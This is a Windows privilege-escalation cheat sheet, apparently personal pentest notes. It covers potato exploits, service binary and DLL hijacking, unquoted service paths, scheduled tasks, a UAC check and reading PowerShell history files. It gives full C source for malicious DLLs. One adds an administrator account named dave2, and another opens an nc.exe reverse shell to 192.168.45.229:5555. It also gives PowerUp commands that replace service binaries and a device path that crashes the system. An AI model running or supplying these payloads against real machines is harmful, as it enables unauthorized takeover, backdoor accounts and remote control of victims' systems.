Windows

CVE

SeImpersonate

TL/DR

Use DeadPotato rigth now
Use Sweet Potato to rule them all - Sweet Potato

If you do not want to use Sweet Potato:

If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato

Service Binary Hijacking

When using a network logon such as WinRM or a bind shell, Get-CimInstance and Get-Service will result in a "permission denied" error when querying for services with a non-administrative user. Using an interactive logon such as RDP solves this problem.

Get a list of all installed Windows services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

The icacls.exe utility outputs the corresponding principals and their permission mask. The most relevant permissions and their masks are listed below:

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

In order to execute the binary through the service, we need to restart it. We can use the net stop command to stop the service.

net stop mysql

If we do not have permission to manually restart the service, we must consider another approach. If the service Startup Type is set to "Automatic", we may be able to restart the service by rebooting the machine.

Check StartMode:

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}

In order to issue a reboot, our user needs to have the privilege SeShutDownPrivilege assigned

PS C:\Users\dave> whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled

PS C:\Users\dave> shutdown /r /t 0

Using PowerUp.ps1

Get Modifiable services and abuse:

PS C:\Users\dave> powershell -ep bypass
...
PS C:\Users\dave>  . .\PowerUp.ps1

PS C:\Users\dave> Get-ModifiableServiceFile

Install-ServiceBinary -Name 'serviceName'

Service DLL Hijacking

The following listing shows the standard search order

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. The directories that are listed in the PATH environment variable.

Find process with missing dll

use procmon from sysinternals to check for missing dlls (“NAME NOT FOUND”)

Make sure you have enough rights to write your dll to this directory

PS C:/path/to_inject/dll>: icacls .
risus-PC\risusUser:(I)(OI)(CI)(F)

Build malicious DLL

The provided comments from Microsoft state that DLL_PROCESS_ATTACH is used when a process is loading the DLL. Since the target service binary process in our example tries to load the DLL, this is the case we need to add our code to.

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave2 password123! /add");
  	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

revshell

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
            i = system ("C:\\Services\\nc.exe 192.168.45.229 5555 -e cmd");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

To fix build problems sudo apt install mingw-w64

Deliver dll and trigger its load

PS C:\Users\steve\Documents> Restart-Service SomeService

Unquoted Service Paths

When Windows starts the service, it will use the following order to try to start the executable file due to the spaces in the path and lack of quotes.

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

Enumerate running and stopped services

PS C:\Users\steve> Get-CimInstance -ClassName win32_service | Select Name,State,PathName 

Name                      State   PathName
----                      -----   --------
...
GammaService                      Stopped C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

it shows a stopped service named GammaService. The unquoted service binary path contains multiple spaces and is therefore potentially vulnerable to this attack vector

Let's enter this command in cmd.exe instead of PowerShell to avoid escaping issues for the quote in the second findstr command. Alternatively, we could use Select-String in PowerShell.

C:\Users\steve> wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
Name                                       PathName                                                                     
...                                                                                                         
GammaService                               C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

The output of this command only lists services that are potentially vulnerable to our attack vector, such as GammaService.

check if we can start and stop the identified service as steve with Start-Service and Stop-Service.

PS C:\Users\steve> Start-Service GammaService
WARNING: Waiting for service 'GammaService (GammaService)' to start...

PS C:\Users\steve> Stop-Service GammaService

Next, let's list the paths Windows uses to attempt locating the executable file of the service.

C:\Program.exe
C:\Program Files\Enterprise.exe
C:\Program Files\Enterprise Apps\Current.exe
C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

Deliver your binary to one of this paths and restart the service

Using PowerUp.ps1

PS C:\Users\dave> powershell -ep bypass
...

PS C:\Users\dave> . .\PowerUp.ps1

PS C:\Users\dave> Get-UnquotedService

PS C:\Users\steve> Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

PS C:\Users\steve> Restart-Service GammaService

Scheduled Tasks

Show scheduled tasks:

PS C:\Users\steve> schtasks /query /fo LIST /v

Check permissions on file from scheduled task:

PS C:\Users\steve> icacls C:\Users\steve\Pictures\SomeService.exe

UAC Bypass

To perform manual enumeration and identify whether a Windows workstation has enabled UAC, you can use the following command from a command prompt:

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Tool Enumeration

To run the SharpUp tool and perform an enumeration if the UAC feature is enabled, you can execute the following command with appropriate argument:

SharpUp.exe audit

PS history

PS C:\Users\dave> Get-History

PS C:\Users\dave> cat C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

BSOD

\\.\globalroot\device\condrv\kernelconnect

PreviousLinux NextPERSIST

Last updated 26 days ago